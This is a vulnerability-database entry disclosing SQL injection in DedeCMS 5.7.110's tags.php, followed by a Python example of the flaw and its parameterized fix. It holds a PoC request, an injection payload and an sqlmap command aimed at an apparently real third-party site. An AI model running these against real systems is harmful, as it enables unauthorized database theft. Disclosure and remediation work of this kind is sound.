| Title | dedecms sql injection |
|---|
| Description | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: DedeCMS's tag query interface has an SQL injection vulnerability. It uses the variable $tag_alias to interpolate strings into SQL query statements
and does not perform any filtering or escaping on $tag_alias. This allows malicious users to inject malicious SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information such as databases.
POC :
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| Source | ⚠️ https://github.com/laoquanshi/cve |
|---|
| User | heishou (UID 53637) |
|---|
| Submission | 30/08/2023 04:49 (3 years ago) |
|---|
| Moderation | 03/09/2023 09:01 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias SQL injection] |
|---|
| Points | 18 |
|---|
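
The interpolation flaw the submission describes, shown next to its fix as an added example (not DedeCMS code and not part of the original submission). It is a Python/sqlite3 stand-in: the `tagindex` table, its columns and the function names are assumptions, and the only injected value used is the one quoted in the submission's payload URL.

```python
import sqlite3

# Injected value as it appears in the submission's payload URL.
PAGE_PAYLOAD = "bbb' AND 8367=8367 AND 'yMwU'='yMwU"

def make_db():
    """Constructed stand-in data; the real DedeCMS schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tagindex (tag TEXT, tag_alias TEXT)")
    db.executemany("INSERT INTO tagindex VALUES (?, ?)",
                   [("news", "bbb"), ("internal", "zzz")])
    return db

def lookup_interpolated(db, tag_alias):
    """Flawed pattern from the report: the value becomes part of the SQL text."""
    sql = "SELECT tag FROM tagindex WHERE tag_alias = '%s'" % tag_alias
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, tag_alias):
    """Hardened: the value is bound as data and is never parsed as SQL."""
    sql = "SELECT tag FROM tagindex WHERE tag_alias = ?"
    return [row[0] for row in db.execute(sql, (tag_alias,))]

def compare(db, tag_alias):
    """Run both lookups; report a SQL error as a string instead of raising."""
    try:
        interpolated = lookup_interpolated(db, tag_alias)
    except sqlite3.Error as exc:
        interpolated = "SQL error: %s" % exc
    return {"interpolated": interpolated, "bound": lookup_bound(db, tag_alias)}

if __name__ == "__main__":
    db = make_db()
    # Benign alias, a lone quote, and the value from the submission.
    for value in ("bbb", "bbb'", PAGE_PAYLOAD):
        print(repr(value), compare(db, value))
```

With the interpolated query, the submitted value returns the same row as the benign alias because its appended conditions run as SQL, and a lone quote breaks the statement. The bound query treats both as literal aliases and returns no rows, which is the behaviour to check for when verifying a fix.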